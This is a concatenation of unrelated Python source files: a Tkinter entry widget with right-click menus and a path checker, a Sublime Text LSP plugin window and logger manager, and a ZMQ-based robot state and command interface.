self.timersEvent.wait(minWait)
self.timersEvent.clear()
|
_entry.py
|
from tkinter import *
from center_tk import Center_root
from tkinter.scrolledtext import ScrolledText
import os , threading
from tkinter import ttk
class _entry(Entry) :
def __init__(self , perent , *args , **kwargs):
Entry.__init__(self , perent , *args , **kwargs)
self.pop = Menu(self ,tearoff =0 )
self.pop.add_command(label = "Cut\t\t", command = self.Cut)
self.pop.add_command(label = "Copy\t\t", command = self.Copy)
self.pop.add_command(label = "Paste\t\t", command = self.Paste)
self.bind('<Button-3>' , self.pop2)
def pop2(self, e):
try:
self.pop.tk_popup(e.x_root , e.y_root , 0)
finally :
self.pop.grab_release()
def Copy(self):
self.event_generate("<<Copy>>")
def Paste(self):
self.event_generate("<<Paste>>")
def Cut(self):
self.event_generate("<<Cut>>")
class _text(Text) :
def __init__(self , perent , *args , **kwargs):
Text.__init__(self , perent , *args , **kwargs)
self.pop = Menu(self ,tearoff =0 )
self.pop.add_command(label = "Cut\t\t", command = self.Cut)
self.pop.add_command(label = "Copy\t\t", command = self.Copy)
self.pop.add_command(label = "Paste\t\t", command = self.Paste)
self.bind('<Button-3>' , self.pop2)
def pop2(self, e):
try:
self.pop.tk_popup(e.x_root , e.y_root , 0)
finally :
self.pop.grab_release()
def Copy(self):
self.event_generate("<<Copy>>")
def Paste(self):
self.event_generate("<<Paste>>")
def Cut(self):
self.event_generate("<<Cut>>")
class scroll_text(ScrolledText) :
def __init__(self , perent , *args , **kwargs):
ScrolledText.__init__(self , perent , *args , **kwargs)
self.pop = Menu(self ,tearoff =0 )
self.pop.add_command(label = "Cut\t\t", command = self.Cut , image =None
, compound = 'left')
self.pop.add_command(label = "Copy\t\t", command = self.Copy , image =None
, compound = 'left')
self.pop.add_command(label = "Paste\t\t", command = self.Paste , image =None
, compound = 'left')
self.bind('<Button-3>' , self.pop2)
def pop2(self, e):
try:
self.pop.tk_popup(e.x_root , e.y_root , 0)
finally :
self.pop.grab_release()
def Copy(self):
self.event_generate("<<Copy>>")
def Paste(self):
self.event_generate("<<Paste>>")
def Cut(self):
self.event_generate("<<Cut>>")
class Check_path :
def __init__(self , label , Entry):
self.label = label
self.Entry = Entry
self.Thread = threading.Thread(target = self.curr).start()
def exists(self,event):
state = os.path.exists(self.Entry.get())
if state :
self.label['text'] = 'The Object Dose exists'
self.label['foreground'] = '#00A600'
else :
self.label['text'] = 'The Object Dose not exists'
self.label['foreground'] = 'red'
def curr(self):
try:
while True:
if len(self.Entry.get()) > 5 :
self.Entry.bind("<Key>" , self.exists)
elif len(self.Entry.get()) == 0 :
self.label['text'] = 'Please Insert Document Path !'
self.label['foreground'] = '#000'
except :
pass
if __name__ == '__main__':
root = Tk()
show = Label(text = 'Please Insert Document Path !')
show.pack()
get_path = _entry(root , width = 40)
exists = Check_path(label = show , Entry = get_path)
center_ = Center_root(master = root, geometry =(300 , 50))
get_path.pack()
root.mainloop()
|
windows.py
|
from ...third_party import WebsocketServer # type: ignore
from .configurations import ConfigManager
from .configurations import WindowConfigManager
from .diagnostics import ensure_diagnostics_panel
from .logging import debug
from .logging import exception_log
from .message_request_handler import MessageRequestHandler
from .panels import log_server_message
from .promise import Promise
from .protocol import Diagnostic
from .protocol import DiagnosticSeverity
from .protocol import DocumentUri
from .protocol import Error
from .protocol import Location
from .sessions import get_plugin
from .sessions import Logger
from .sessions import Manager
from .sessions import Session
from .sessions import SessionBufferProtocol
from .sessions import SessionViewProtocol
from .settings import userprefs
from .transports import create_transport
from .types import ClientConfig
from .types import matches_pattern
from .typing import Optional, Any, Dict, Deque, List, Generator, Tuple, Iterable, Sequence, Union
from .url import parse_uri
from .views import extract_variables
from .views import make_link
from .workspace import ProjectFolders
from .workspace import sorted_workspace_folders
from abc import ABCMeta
from abc import abstractmethod
from collections import deque
from subprocess import CalledProcessError
from time import time
from weakref import ref
from weakref import WeakSet
import functools
import json
import sublime
import threading
import urllib.parse
_NO_DIAGNOSTICS_PLACEHOLDER = " No diagnostics. Well done!"
class AbstractViewListener(metaclass=ABCMeta):
TOTAL_ERRORS_AND_WARNINGS_STATUS_KEY = "lsp_total_errors_and_warnings"
view = None # type: sublime.View
@abstractmethod
def session_async(self, capability_path: str, point: Optional[int] = None) -> Optional[Session]:
raise NotImplementedError()
@abstractmethod
def sessions_async(self, capability_path: Optional[str] = None) -> Generator[Session, None, None]:
raise NotImplementedError()
@abstractmethod
def session_views_async(self) -> Iterable[SessionViewProtocol]:
raise NotImplementedError()
@abstractmethod
def on_session_initialized_async(self, session: Session) -> None:
raise NotImplementedError()
@abstractmethod
def on_session_shutdown_async(self, session: Session) -> None:
raise NotImplementedError()
@abstractmethod
def diagnostics_async(self) -> Iterable[Tuple[SessionBufferProtocol, Sequence[Tuple[Diagnostic, sublime.Region]]]]:
raise NotImplementedError()
@abstractmethod
def diagnostics_intersecting_region_async(
self,
region: sublime.Region
) -> Tuple[Sequence[Tuple[SessionBufferProtocol, Sequence[Diagnostic]]], sublime.Region]:
raise NotImplementedError()
@abstractmethod
def diagnostics_touching_point_async(
self,
pt: int,
max_diagnostic_severity_level: int = DiagnosticSeverity.Hint
) -> Tuple[Sequence[Tuple[SessionBufferProtocol, Sequence[Diagnostic]]], sublime.Region]:
raise NotImplementedError()
def diagnostics_intersecting_async(
self,
region_or_point: Union[sublime.Region, int]
) -> Tuple[Sequence[Tuple[SessionBufferProtocol, Sequence[Diagnostic]]], sublime.Region]:
if isinstance(region_or_point, int):
return self.diagnostics_touching_point_async(region_or_point)
elif region_or_point.empty():
return self.diagnostics_touching_point_async(region_or_point.a)
else:
return self.diagnostics_intersecting_region_async(region_or_point)
@abstractmethod
def on_diagnostics_updated_async(self) -> None:
raise NotImplementedError()
@abstractmethod
def on_code_lens_capability_registered_async(self) -> None:
raise NotImplementedError()
@abstractmethod
def get_language_id(self) -> str:
raise NotImplementedError()
@abstractmethod
def get_uri(self) -> str:
raise NotImplementedError()
@abstractmethod
def do_signature_help_async(self, manual: bool) -> None:
raise NotImplementedError()
@abstractmethod
def navigate_signature_help(self, forward: bool) -> None:
raise NotImplementedError()
@abstractmethod
def on_post_move_window_async(self) -> None:
raise NotImplementedError()
def extract_message(params: Any) -> str:
return params.get("message", "???") if isinstance(params, dict) else "???"
def set_diagnostics_count(view: sublime.View, errors: int, warnings: int) -> None:
try:
key = AbstractViewListener.TOTAL_ERRORS_AND_WARNINGS_STATUS_KEY
if userprefs().show_diagnostics_count_in_view_status:
view.set_status(key, "E: {}, W: {}".format(errors, warnings))
else:
view.erase_status(key)
except Exception:
pass
class WindowManager(Manager):
DIAGNOSTIC_PHANTOM_KEY = "lsp_diagnostic_phantom"
def __init__(
self,
window: sublime.Window,
workspace: ProjectFolders,
configs: WindowConfigManager,
) -> None:
self._window = window
self._configs = configs
self._sessions = WeakSet() # type: WeakSet[Session]
self._workspace = workspace
self._pending_listeners = deque() # type: Deque[AbstractViewListener]
self._listeners = WeakSet() # type: WeakSet[AbstractViewListener]
self._new_listener = None # type: Optional[AbstractViewListener]
self._new_session = None # type: Optional[Session]
self._diagnostic_phantom_set = None # type: Optional[sublime.PhantomSet]
self._panel_code_phantoms = None # type: Optional[sublime.PhantomSet]
self.total_error_count = 0
self.total_warning_count = 0
sublime.set_timeout(functools.partial(self._update_panel_main_thread, _NO_DIAGNOSTICS_PLACEHOLDER, []))
def get_config_manager(self) -> WindowConfigManager:
return self._configs
def on_load_project_async(self) -> None:
self.update_workspace_folders_async()
self._configs.update()
def on_post_save_project_async(self) -> None:
self.on_load_project_async()
def update_workspace_folders_async(self) -> None:
if self._workspace.update():
workspace_folders = self._workspace.get_workspace_folders()
for session in self._sessions:
session.update_folders(workspace_folders)
def enable_config_async(self, config_name: str) -> None:
self._configs.enable_config(config_name)
def disable_config_async(self, config_name: str) -> None:
self._configs.disable_config(config_name)
def open_location_async(
self,
location: Location,
session_name: Optional[str],
view: sublime.View,
flags: int = 0,
group: int = -1
) -> Promise[bool]:
for session in self.sessions(view):
if session_name is None or session_name == session.config.name:
return session.open_location_async(location, flags, group)
return Promise.resolve(False)
def register_listener_async(self, listener: AbstractViewListener) -> None:
set_diagnostics_count(listener.view, self.total_error_count, self.total_warning_count)
# Update workspace folders in case the user have changed those since window was created.
# There is no currently no notification in ST that would notify about folder changes.
self.update_workspace_folders_async()
self._pending_listeners.appendleft(listener)
if self._new_listener is None:
self._dequeue_listener_async()
def unregister_listener_async(self, listener: AbstractViewListener) -> None:
self._listeners.discard(listener)
def listeners(self) -> Generator[AbstractViewListener, None, None]:
yield from self._listeners
def listener_for_view(self, view: sublime.View) -> Optional[AbstractViewListener]:
for listener in self.listeners():
if listener.view == view:
return listener
return None
def _dequeue_listener_async(self) -> None:
listener = None # type: Optional[AbstractViewListener]
if self._new_listener is not None:
listener = self._new_listener
# debug("re-checking listener", listener)
self._new_listener = None
else:
try:
listener = self._pending_listeners.pop()
if not listener.view.is_valid():
# debug("listener", listener, "is no longer valid")
return self._dequeue_listener_async()
# debug("adding new pending listener", listener)
self._listeners.add(listener)
except IndexError:
# We have handled all pending listeners.
self._new_session = None
return
if self._new_session:
self._sessions.add(self._new_session)
self._publish_sessions_to_listener_async(listener)
if self._new_session:
if not any(self._new_session.session_views_async()):
self._sessions.discard(self._new_session)
self._new_session.end_async()
self._new_session = None
config = self._needed_config(listener.view)
if config:
# debug("found new config for listener", listener)
self._new_listener = listener
self.start_async(config, listener.view)
else:
# debug("no new config found for listener", listener)
self._new_listener = None
self._dequeue_listener_async()
def _publish_sessions_to_listener_async(self, listener: AbstractViewListener) -> None:
inside_workspace = self._workspace.contains(listener.view)
scheme = urllib.parse.urlparse(listener.get_uri()).scheme
for session in self._sessions:
if session.can_handle(listener.view, scheme, capability=None, inside_workspace=inside_workspace):
# debug("registering session", session.config.name, "to listener", listener)
try:
listener.on_session_initialized_async(session)
except Exception as ex:
message = "failed to register session {} to listener {}".format(session.config.name, listener)
exception_log(message, ex)
def window(self) -> sublime.Window:
return self._window
def sessions(self, view: sublime.View, capability: Optional[str] = None) -> Generator[Session, None, None]:
inside_workspace = self._workspace.contains(view)
sessions = list(self._sessions)
uri = view.settings().get("lsp_uri")
if not isinstance(uri, str):
return
scheme = urllib.parse.urlparse(uri).scheme
for session in sessions:
if session.can_handle(view, scheme, capability, inside_workspace):
yield session
def get_session(self, config_name: str, file_path: str) -> Optional[Session]:
return self._find_session(config_name, file_path)
def _can_start_config(self, config_name: str, file_path: str) -> bool:
return not bool(self._find_session(config_name, file_path))
def _find_session(self, config_name: str, file_path: str) -> Optional[Session]:
inside = self._workspace.contains(file_path)
for session in self._sessions:
if session.config.name == config_name and session.handles_path(file_path, inside):
return session
return None
def _needed_config(self, view: sublime.View) -> Optional[ClientConfig]:
configs = self._configs.match_view(view)
handled = False
file_name = view.file_name()
inside = self._workspace.contains(view)
for config in configs:
handled = False
for session in self._sessions:
if config.name == session.config.name and session.handles_path(file_name, inside):
handled = True
break
if not handled:
return config
return None
def start_async(self, config: ClientConfig, initiating_view: sublime.View) -> None:
config = ClientConfig.from_config(config, {})
file_path = initiating_view.file_name() or ''
if not self._can_start_config(config.name, file_path):
# debug('Already starting on this window:', config.name)
return
try:
workspace_folders = sorted_workspace_folders(self._workspace.folders, file_path)
plugin_class = get_plugin(config.name)
variables = extract_variables(self._window)
cwd = None # type: Optional[str]
if plugin_class is not None:
if plugin_class.needs_update_or_installation():
config.set_view_status(initiating_view, "installing...")
plugin_class.install_or_update()
additional_variables = plugin_class.additional_variables()
if isinstance(additional_variables, dict):
variables.update(additional_variables)
cannot_start_reason = plugin_class.can_start(self._window, initiating_view, workspace_folders, config)
if cannot_start_reason:
config.erase_view_status(initiating_view)
message = "cannot start {}: {}".format(config.name, cannot_start_reason)
self._configs.disable_config(config.name, only_for_session=True)
# Continue with handling pending listeners
self._new_session = None
sublime.set_timeout_async(self._dequeue_listener_async)
return self._window.status_message(message)
cwd = plugin_class.on_pre_start(self._window, initiating_view, workspace_folders, config)
config.set_view_status(initiating_view, "starting...")
session = Session(self, self._create_logger(config.name), workspace_folders, config, plugin_class)
if cwd:
transport_cwd = cwd # type: Optional[str]
else:
transport_cwd = workspace_folders[0].path if workspace_folders else None
transport_config = config.resolve_transport_config(variables)
transport = create_transport(transport_config, transport_cwd, session)
if plugin_class:
plugin_class.on_post_start(self._window, initiating_view, workspace_folders, config)
config.set_view_status(initiating_view, "initialize")
session.initialize_async(
variables=variables,
transport=transport,
working_directory=cwd,
init_callback=functools.partial(self._on_post_session_initialize, initiating_view)
)
self._new_session = session
except Exception as e:
message = "".join((
"Failed to start {0} - disabling for this window for the duration of the current session.\n",
"Re-enable by running \"LSP: Enable Language Server In Project\" from the Command Palette.",
"\n\n--- Error: ---\n{1}"
)).format(config.name, str(e))
exception_log("Unable to start subprocess for {}".format(config.name), e)
if isinstance(e, CalledProcessError):
print("Server output:\n{}".format(e.output.decode('utf-8', 'replace')))
self._configs.disable_config(config.name, only_for_session=True)
config.erase_view_status(initiating_view)
sublime.message_dialog(message)
# Continue with handling pending listeners
self._new_session = None
sublime.set_timeout_async(self._dequeue_listener_async)
def _on_post_session_initialize(
self, initiating_view: sublime.View, session: Session, is_error: bool = False
) -> None:
if is_error:
session.config.erase_view_status(initiating_view)
self._new_listener = None
self._new_session = None
else:
sublime.set_timeout_async(self._dequeue_listener_async)
def _create_logger(self, config_name: str) -> Logger:
logger_map = {
"panel": PanelLogger,
"remote": RemoteLogger,
}
loggers = []
for logger_type in userprefs().log_server:
if logger_type not in logger_map:
debug("Invalid logger type ({}) specified for log_server settings".format(logger_type))
continue
loggers.append(logger_map[logger_type])
if len(loggers) == 0:
return RouterLogger() # logs nothing
elif len(loggers) == 1:
return loggers[0](self, config_name)
else:
router_logger = RouterLogger()
for logger in loggers:
router_logger.append(logger(self, config_name))
return router_logger
def handle_message_request(self, session: Session, params: Any, request_id: Any) -> None:
view = self._window.active_view()
if view:
MessageRequestHandler(view, session, request_id, params, session.config.name).show()
def restart_sessions_async(self) -> None:
self._end_sessions_async()
listeners = list(self._listeners)
self._listeners.clear()
for listener in listeners:
self.register_listener_async(listener)
def _end_sessions_async(self) -> None:
for session in self._sessions:
session.end_async()
self._sessions.clear()
def end_config_sessions_async(self, config_name: str) -> None:
sessions = list(self._sessions)
for session in sessions:
if session.config.name == config_name:
session.end_async()
self._sessions.discard(session)
def get_project_path(self, file_path: str) -> Optional[str]:
candidate = None # type: Optional[str]
for folder in self._workspace.folders:
if file_path.startswith(folder):
if candidate is None or len(folder) > len(candidate):
candidate = folder
return candidate
def should_present_diagnostics(self, uri: DocumentUri) -> Optional[str]:
scheme, path = parse_uri(uri)
if scheme != "file":
return None
if not self._workspace.contains(path):
return "not inside window folders"
view = self._window.active_view()
if not view:
return None
settings = view.settings()
if matches_pattern(path, settings.get("binary_file_patterns")):
return "matches a pattern in binary_file_patterns"
if matches_pattern(path, settings.get("file_exclude_patterns")):
return "matches a pattern in file_exclude_patterns"
if matches_pattern(path, settings.get("folder_exclude_patterns")):
return "matches a pattern in folder_exclude_patterns"
return None
def on_post_exit_async(self, session: Session, exit_code: int, exception: Optional[Exception]) -> None:
self._sessions.discard(session)
for listener in self._listeners:
listener.on_session_shutdown_async(session)
if exit_code != 0 or exception:
config = session.config
msg = "".join((
"{0} exited with status code {1}. ",
"Do you want to restart it? If you choose Cancel, it will be disabled for this window for the ",
"duration of the current session. ",
"Re-enable by running \"LSP: Enable Language Server In Project\" from the Command Palette."
)).format(config.name, exit_code)
if exception:
msg += "\n\n--- Error: ---\n{}".format(str(exception))
if sublime.ok_cancel_dialog(msg, "Restart {}".format(config.name)):
for listener in self._listeners:
self.register_listener_async(listener)
else:
self._configs.disable_config(config.name, only_for_session=True)
def plugin_unloaded(self) -> None:
"""
This is called **from the main thread** when the plugin unloads. In that case we must destroy all sessions
from the main thread. That could lead to some dict/list being mutated while iterated over, so be careful
"""
self._end_sessions_async()
def handle_server_message(self, server_name: str, message: str) -> None:
sublime.set_timeout(lambda: log_server_message(self._window, server_name, message))
def handle_log_message(self, session: Session, params: Any) -> None:
self.handle_server_message(session.config.name, extract_message(params))
def handle_stderr_log(self, session: Session, message: str) -> None:
self.handle_server_message(session.config.name, message)
def handle_show_message(self, session: Session, params: Any) -> None:
sublime.status_message("{}: {}".format(session.config.name, extract_message(params)))
def update_diagnostics_panel_async(self) -> None:
to_render = [] # type: List[str]
self.total_error_count = 0
self.total_warning_count = 0
listeners = list(self._listeners)
prephantoms = [] # type: List[Tuple[int, int, str, str]]
row = 0
for session in self._sessions:
local_errors, local_warnings = session.diagnostics_manager.sum_total_errors_and_warnings_async()
self.total_error_count += local_errors
self.total_warning_count += local_warnings
for path, contribution in session.diagnostics_manager.diagnostics_panel_contributions_async():
to_render.append("{}:".format(path))
row += 1
for content, offset, code, href in contribution:
to_render.append(content)
if offset is not None and code is not None and href is not None:
prephantoms.append((row, offset, code, href))
row += content.count("\n") + 1
to_render.append("") # add spacing between filenames
row += 1
for listener in listeners:
set_diagnostics_count(listener.view, self.total_error_count, self.total_warning_count)
characters = "\n".join(to_render)
if not characters:
characters = _NO_DIAGNOSTICS_PLACEHOLDER
sublime.set_timeout(functools.partial(self._update_panel_main_thread, characters, prephantoms))
def _update_panel_main_thread(self, characters: str, prephantoms: List[Tuple[int, int, str, str]]) -> None:
panel = ensure_diagnostics_panel(self._window)
if not panel or not panel.is_valid():
return
panel.run_command("lsp_update_panel", {"characters": characters})
if self._panel_code_phantoms is None:
self._panel_code_phantoms = sublime.PhantomSet(panel, "hrefs")
phantoms = [] # type: List[sublime.Phantom]
for row, col, code, href in prephantoms:
point = panel.text_point(row, col)
region = sublime.Region(point, point)
phantoms.append(sublime.Phantom(region, make_link(href, code), sublime.LAYOUT_INLINE))
self._panel_code_phantoms.update(phantoms)
def show_diagnostics_panel_async(self) -> None:
if self._window.active_panel() is None:
self._window.run_command("show_panel", {"panel": "output.diagnostics"})
class WindowRegistry(object):
def __init__(self, configs: ConfigManager) -> None:
self._windows = {} # type: Dict[int, WindowManager]
self._configs = configs
def lookup(self, window: sublime.Window) -> WindowManager:
wm = self._windows.get(window.id())
if wm:
return wm
workspace = ProjectFolders(window)
window_configs = self._configs.for_window(window)
state = WindowManager(window=window, workspace=workspace, configs=window_configs)
self._windows[window.id()] = state
return state
def listener_for_view(self, view: sublime.View) -> Optional[AbstractViewListener]:
w = view.window()
if not w:
return None
return self.lookup(w).listener_for_view(view)
def discard(self, window: sublime.Window) -> None:
self._windows.pop(window.id(), None)
class PanelLogger(Logger):
def __init__(self, manager: WindowManager, server_name: str) -> None:
self._manager = ref(manager)
self._server_name = server_name
def stderr_message(self, message: str) -> None:
"""
Not handled here as stderr messages are handled by WindowManager regardless
if this logger is enabled.
"""
pass
def log(self, message: str, params: Any) -> None:
def run_on_async_worker_thread() -> None:
nonlocal message
params_str = str(params)
if 0 < userprefs().log_max_size <= len(params_str):
params_str = '<params with {} characters>'.format(len(params_str))
message = "{}: {}".format(message, params_str)
manager = self._manager()
if manager is not None:
manager.handle_server_message(":", message)
sublime.set_timeout_async(run_on_async_worker_thread)
def outgoing_response(self, request_id: Any, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_response(">>>", request_id), params)
def outgoing_error_response(self, request_id: Any, error: Error) -> None:
if not userprefs().log_server:
return
self.log(self._format_response("~~>", request_id), error.to_lsp())
def outgoing_request(self, request_id: int, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_request("-->", method, request_id), params)
def outgoing_notification(self, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_notification(" ->", method), params)
def incoming_response(self, request_id: int, params: Any, is_error: bool) -> None:
if not userprefs().log_server:
return
direction = "<~~" if is_error else "<<<"
self.log(self._format_response(direction, request_id), params)
def incoming_request(self, request_id: Any, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_request("<--", method, request_id), params)
def incoming_notification(self, method: str, params: Any, unhandled: bool) -> None:
if not userprefs().log_server:
return
direction = "<? " if unhandled else "<- "
self.log(self._format_notification(direction, method), params)
def _format_response(self, direction: str, request_id: Any) -> str:
return "{} {} {}".format(direction, self._server_name, request_id)
def _format_request(self, direction: str, method: str, request_id: Any) -> str:
return "{} {} {}({})".format(direction, self._server_name, method, request_id)
def _format_notification(self, direction: str, method: str) -> str:
return "{} {} {}".format(direction, self._server_name, method)
class RemoteLogger(Logger):
PORT = 9981
DIRECTION_OUTGOING = 1
DIRECTION_INCOMING = 2
_ws_server = None # type: Optional[WebsocketServer]
_ws_server_thread = None # type: Optional[threading.Thread]
_last_id = 0
def __init__(self, manager: WindowManager, server_name: str) -> None:
RemoteLogger._last_id += 1
self._server_name = '{} ({})'.format(server_name, RemoteLogger._last_id)
if not RemoteLogger._ws_server:
try:
RemoteLogger._ws_server = WebsocketServer(self.PORT)
RemoteLogger._ws_server.set_fn_new_client(self._on_new_client)
RemoteLogger._ws_server.set_fn_client_left(self._on_client_left)
RemoteLogger._ws_server.set_fn_message_received(self._on_message_received)
self._start_server()
except OSError as ex:
if ex.errno == 48: # Address already in use
debug('WebsocketServer not started - address already in use')
RemoteLogger._ws_server = None
else:
raise ex
def _start_server(self) -> None:
def start_async() -> None:
if RemoteLogger._ws_server:
RemoteLogger._ws_server.run_forever()
RemoteLogger._ws_server_thread = threading.Thread(target=start_async)
RemoteLogger._ws_server_thread.start()
def _stop_server(self) -> None:
if RemoteLogger._ws_server:
RemoteLogger._ws_server.shutdown()
RemoteLogger._ws_server = None
if RemoteLogger._ws_server_thread:
RemoteLogger._ws_server_thread.join()
RemoteLogger._ws_server_thread = None
def _on_new_client(self, client: Dict, server: WebsocketServer) -> None:
"""Called for every client connecting (after handshake)."""
debug("New client connected and was given id %d" % client['id'])
# server.send_message_to_all("Hey all, a new client has joined us")
def _on_client_left(self, client: Dict, server: WebsocketServer) -> None:
"""Called for every client disconnecting."""
debug("Client(%d) disconnected" % client['id'])
def _on_message_received(self, client: Dict, server: WebsocketServer, message: str) -> None:
"""Called when a client sends a message."""
debug("Client(%d) said: %s" % (client['id'], message))
def stderr_message(self, message: str) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'method': 'stderr',
'params': message,
'isError': True,
'direction': self.DIRECTION_INCOMING,
})
def outgoing_request(self, request_id: int, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def incoming_response(self, request_id: int, params: Any, is_error: bool) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'params': params,
'direction': self.DIRECTION_INCOMING,
'isError': is_error,
})
def incoming_request(self, request_id: Any, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_INCOMING,
})
def outgoing_response(self, request_id: Any, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def outgoing_error_response(self, request_id: Any, error: Error) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'isError': True,
'params': error.to_lsp(),
'time': round(time() * 1000),
'direction': self.DIRECTION_OUTGOING,
})
def outgoing_notification(self, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def incoming_notification(self, method: str, params: Any, unhandled: bool) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'error': 'Unhandled notification!' if unhandled else None,
'method': method,
'params': params,
'direction': self.DIRECTION_INCOMING,
})
def _broadcast_json(self, data: Dict[str, Any]) -> None:
if RemoteLogger._ws_server:
json_data = json.dumps(data, sort_keys=True, check_circular=False, separators=(',', ':'))
RemoteLogger._ws_server.send_message_to_all(json_data)
class RouterLogger(Logger):
def __init__(self) -> None:
self._loggers = [] # type: List[Logger]
def append(self, logger: Logger) -> None:
self._loggers.append(logger)
def stderr_message(self, *args: Any, **kwargs: Any) -> None:
self._foreach("stderr_message", *args, **kwargs)
def outgoing_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_response", *args, **kwargs)
def outgoing_error_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_error_response", *args, **kwargs)
def outgoing_request(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_request", *args, **kwargs)
def outgoing_notification(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_notification", *args, **kwargs)
def incoming_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_response", *args, **kwargs)
def incoming_request(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_request", *args, **kwargs)
def incoming_notification(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_notification", *args, **kwargs)
def _foreach(self, method: str, *args: Any, **kwargs: Any) -> None:
for logger in self._loggers:
getattr(logger, method)(*args, **kwargs)
|
zmq_robot_interface.py
|
#
# MIT License
#
# Copyright (c) 2020-2021 NVIDIA CORPORATION.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.#
import numpy as np
import time
import zmq
from threading import Thread
def send_array(socket, A, flags=0, copy=True, track=False):
"""send a numpy array with metadata"""
md = dict(
dtype = str(A.dtype),
shape = A.shape,
)
socket.send_json(md, flags|zmq.SNDMORE)
return socket.send(A, flags, copy=copy, track=track)
def recv_array(socket, flags=0, copy=True, track=False):
"""recv a numpy array"""
md = socket.recv_json(flags=flags)
msg = socket.recv(flags=flags, copy=copy, track=track)
buf = memoryview(msg)
A = np.frombuffer(buf, dtype=md['dtype'])
return A.reshape(md['shape'])
class SimComms(object):
def __init__(self, pub_topic='control_traj', sub_topic='robot_state', host='127.0.0.1', pub_port='5001',
sub_port='5002'):
self.dt = 1 / 1000.0
self.done = False
self.context = zmq.Context()
self.pub_socket = self.context.socket(zmq.PUB)
self.pub_socket.bind("tcp://{}:{}".format(host, pub_port))
self.pub_topic = pub_topic
self.sub_socket = self.context.socket(zmq.SUB)
self.sub_socket.setsockopt(zmq.RCVTIMEO, 1000)
self.sub_socket.connect("tcp://{}:{}".format(host, sub_port))
self.sub_topic = sub_topic
self.sub_socket.subscribe(self.sub_topic)
#self.state = None
self.state_message = None
self.state_topic = None
self.pub_array = None
self.t1 = Thread(target=self.thread_fn_sub)
self.t1.start()
self.t2 = Thread(target=self.thread_fn_pub)
self.t2.start()
def thread_fn_sub(self):
while not self.done:
try:
topic = self.sub_socket.recv_string(flags=zmq.NOBLOCK)
except zmq.Again as e:
time.sleep(self.dt)
continue
state = recv_array(self.sub_socket, flags=zmq.NOBLOCK, copy=True, track=False)
if(topic == self.sub_topic):
self.state_message = state
self.state_topic = topic
def thread_fn_pub(self):
#print(self.done)
while(not self.done):
if(self.pub_array is not None):
#print(self.robot_state_pub)
#print(self.pub_topic, self.pub_array)
self.pub_socket.send_string(self.pub_topic, flags=zmq.SNDMORE)
send_array(self.pub_socket,self.pub_array, flags=0, copy=True, track=False)
self.pub_array = None
time.sleep(self.dt)
return True
def close(self):
self.done = True
self.sub_socket.close()
self.pub_socket.close()
self.context.term()
def send_command(self, cmd):
#print("setting command...")
self.pub_array = cmd
#print(self.done)
#print(self.pub_array)
def get_state(self):
state_message = self.state_message
self.state_message = None
return state_message
class RobotInterface(object):
def __init__(self, pub_topic='control_traj', sub_topic='robot_state', host='127.0.0.1', pub_port='5001', sub_port='5002',pair_port='5003'):
self.sub_hz = 500.0
self.pub_topic = pub_topic
self.sub_topic = sub_topic
self.host = host
self.pub_port = pub_port
self.sub_port = sub_port
self.state_topic = sub_topic
self.zmq_comms = SimComms(sub_topic=sub_topic,
pub_topic=pub_topic,
host=host,
sub_port=sub_port,
pub_port=pub_port)
def get_state(self):
#print("waiting on state")
self.state = self.zmq_comms.get_state()
while(self.state is None):
try:
self.state = self.zmq_comms.get_state()
except KeyboardInterrupt:
exit()
self.state = np.ravel(self.state)
if(len(self.state) > 6*3):
state = self.state[:-9]
goal_pose = self.state[-9:-2]
#print(self.state)
t_idx = self.state[-2:-1]
open_loop = self.state[-1:0]
else:
state = self.state
goal_pose, t_idx, open_loop = None, None, 0
state_dict = {'robot_state': state,'goal_pose': goal_pose, 't_idx': t_idx, 'open_loop':
bool(open_loop)}
self.state = None
return state_dict
def publish_state(self, state):
pass
def publish_action(self, action_traj, append_time=True,dt=0.1):
num_commands = action_traj.shape[0]
if append_time:
command_times = np.arange(start=0.0,stop=dt*len(action_traj), step=dt).reshape(len(action_traj),1)
#print(command_times)
command = action_traj
if append_time:
command = np.concatenate((command, command_times),axis=-1)
#print(command)
self.zmq_comms.send_command(command)
